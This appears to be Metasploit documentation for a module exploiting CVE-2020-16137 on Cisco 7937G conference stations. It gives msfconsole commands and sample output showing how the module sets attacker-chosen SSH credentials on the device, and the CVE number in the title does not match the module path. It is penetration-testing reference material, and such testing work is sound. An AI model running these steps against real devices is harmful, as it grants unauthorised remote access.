Documentation for CVE-2020-16137
Vulnerable Application
- Obtain a Cisco 7937G Conference Station.
- Enable Web Access and SSH Access on the device.
- Based on the firmware available from Cisco, all versions are likely vulnerable.
Verification Steps
- Start msfconsole
- Do: use auxiliary/dos/cisco/CVE-2020-16139
- Do: set RHOSTS 192.168.1.10
- Do: set USER test
- Do: set PASS test
- Do: run
- The conference station's SSH service should now be configured with the supplied USER:PASS.
Options
- PASS (required) - Desired password
- RHOSTS (required) - Target address
- THREADS (default 1, required) - The number of concurrent threads (max one per host)
- TIMEOUT (default 5, required) - Timeout in seconds before aborting
- USER (required) - Desired username
Scenarios
Successful Scenario
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
Unsuccessful Scenario
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed